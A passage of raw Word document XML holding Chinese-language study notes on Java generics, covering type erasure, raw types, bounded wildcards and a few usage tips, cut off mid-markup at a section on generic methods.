        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C36721">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36721">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的泛型是伪泛型</w:t>
      </w:r>
      <w:r w:rsidRPr="00D976AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。在编译期间，所有的泛型信息都会被擦除掉。正确理解泛型概念的首要前提是理解类型擦出（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D976AB">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>type erasure</w:t>
      </w:r>
      <w:r w:rsidRPr="00D976AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D976AB" w:rsidRDefault="00D976AB" w:rsidP="00D976AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D976AB">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>       Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00D976AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的泛型基本上都是在编译器这个层次来实现的。在生成的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D976AB">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00D976AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>字节码中是不包含泛型中的类型信息的。使用泛型的时候加上的类型参数，会在编译器在编译的时候去掉。这个过程就称为类型擦除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3442" w:rsidRDefault="005C3442" w:rsidP="004D1495">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如在代码中定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List&lt;object&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List&lt;String&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等类型，在编译后都会编程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>看到的只是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，而由泛型附加的类型信息对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来说是不可见的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编译器会在编译时尽可能的发现可能出错的地方，但是仍然无法避免在运行时刻出现类型转换异常的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E3F0F" w:rsidRPr="007E3F0F" w:rsidRDefault="007E3F0F" w:rsidP="007E3F0F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3F0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>    原始类型（</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3F0F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>raw type</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3F0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）就是擦除去了泛型信息，最后在字节码中的类型变量的真正类型。无论何时定义一个泛型类型，相应的原始类型都会被自动地提供。类型变量被擦除（</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3F0F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>crased</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3F0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>），并使用其限定类型（无限定的变量用</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3F0F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3F0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>）替换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E3F0F" w:rsidRPr="00D976AB" w:rsidRDefault="00763D5F" w:rsidP="004D1495">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763D5F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>http://irfen.iteye.com/blog/1888312</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D976AB" w:rsidRPr="005646DE" w:rsidRDefault="00D976AB" w:rsidP="005646DE">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005646DE" w:rsidRDefault="006C522D" w:rsidP="00870D24">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通配符类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00870D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;? extends T&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表示类型的上界，表示参数化类型的可能是</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">T </w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或是</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的子类</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00870D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;? super T&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表示类型下界（</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java Core</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中叫超类型限定），表示参数化类型是此类型的超类型（父类型），直至</w:t>
      </w:r>
      <w:r w:rsidRPr="00870D24">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080D3B" w:rsidRPr="00870D24" w:rsidRDefault="00080D3B" w:rsidP="00870D24">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟机中没有泛型，只有普通类和普通方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000C6B90">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所有泛型类的类型参数在编译时都会被擦除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000C6B90">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建泛型对象时请指明类型，让编译器尽早的做参数检查（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Effective Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>条：请不要在新代码中使用原生态类型）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000C6B90">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不要忽略编译器的警告信息，那意味着潜在的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ClassCastException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等着你。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797752" w:rsidRDefault="00797752" w:rsidP="00797752">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛型方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144FEF" w:rsidRDefault="00797752" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，必须在方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>修饰符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>前面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
